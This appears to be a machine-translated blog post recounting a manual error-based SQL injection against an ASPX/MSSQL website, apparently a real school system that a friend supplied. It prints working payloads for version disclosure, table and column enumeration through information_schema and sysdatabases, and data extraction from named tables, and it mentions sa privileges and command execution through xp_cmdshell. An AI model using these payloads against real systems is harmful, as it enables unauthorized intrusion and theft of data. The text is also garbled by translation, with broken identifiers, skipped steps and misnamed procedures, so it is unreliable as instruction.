Manual MSSQL injection notes for one failure (a textbook-like MSSQL injection tutorial)

Yesterday, k0baikeyou threw a website. Aspx + mssql Program (;"Used to separate two statements, and"--"Is the annotator, and the statements after it are not executed! Don't ask me why I add

 

Step 1,

'And 1 = 1 error

And '1' = '1 normal

 

Return normal

The sa permission is displayed !!!!!

Excited

Step 3,

Next let's take a look at the SQL version.

'And 1 = convert (int, @ version )--

 

Okay.

Try to run the command.

Various commands can be executed. However, the system prompts that the account does not exist when you log on to the console without adding an account. An error occurred while winning the command. Continue to start table explosion

If xp_mongoshell is not supported, Baidu will check how to restore it. You can only give up if you cannot.

Step 5,

First, the first method. Error echo.

"Having 1 = 1 --"

If the returned result is normal, no other columns exist in the table ..

In this way, we can guess the T_ZY_TeacherInfo table.

So how can we guess other tables?

Now we need "information_schema.tables" and "information_schema.columns ".

Submit the following data.

'And 1 = convert (int, (select top 1 table_name from information_schema.tables ))--

T_ZY_PalaestraInfo

'And 1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ('view _ r_xzbjtohj','t _ ZY_PalaestraInfo ', 'view _ rm_yxcws_ch_fp ', 't_jh_setlessoninfo_temp_afterdelete ', 'v _ KH_TeacherSkbj1', 'Auto _ SKBJ_JC ', 'bjrs', 'brow _ view', 'Dan _ gege ', 'hlpktly ', 'hlplqlx ')))--

 

Submit again

'And 1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Auto _ SKBJ_JC' and column_name not in ('skbj ')))--

Burst all columns

'And 1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Auto _ SKBJ_JC' and column_name not in ('skbj ', 'jcz', 'jsm ', 'zc', 'stimezc', 'dsz', 'xn ', 'xq _ id', 'jcinfo','t _ js', 'jcanalyse', 'jjs ', 'tk _ flag', 'tk _ CDTATE ', 'y _ JCZ', 'y _ dsz', 'y _ JSM ', 'y _ js ', 'Y _ stimezc', 'y _ jcinfo', 'y _ Y_JS ', 'sffzxk', 'cddw _ id', 'kcid', 'analyse', 'skbjmc ', 'tingk _ flag', 'zhub ', 'tkyy', 'tingkyy', 'classgroup', 'jxjdbxh', 'jslx', 'skbjxh ', 'kc _ flag ')))--

Starting to burst content

The contents of the first row in the JSM column in The AUTO_SKBJ_JC table are displayed.

'And 1 = convert (int, (select top 1 JSM from AUTO_SKBJ_JC ))--

'And 1 = convert (int, (select top 1 JSM from AUTO_SKBJ_JC where JSM not in ('105k101', '105k206 ', '105k104 ')))--

Method 2

First of all, sysdatabases is the default system table of MSSQL, including the "master", "msdb", "mssqlweb", "empdb", and "model" tables, the value of the corresponding bdid is 1 to 5. the user-created database starts from bdid = 6. We can change the value of bdid to expose the database name.

Submit Statement

'And 1 = (select name from master. dbo. sysdatabases where dbid = 7 )--

All tables are displayed in sequence. I won't do it here.

Use the default system table to list columns in the brute-force table. You must use the ID value of the target table in the database to obtain the specific content of the table.

'And 1 = (select count (*) from yczyxy_jwgl1db.dbo.sysobjects where xtype = 'U' and name ='t _ zy_palaestrainfo' and uid> (str (id )))--

 

 

All column names are displayed in sequence.

'And 1 = (select top 1 name from yczyxy_jwgl1db.dbo.syscolumns where id = 823165 and name not in ('dm', 'jzmj', 'lx _ id', 'mc '))--

Starting to burst content

'And 1 = (select MC from yczyxy_jwgl1db.dbo.T_ZY_PalaestraInfo where MC> 0 )--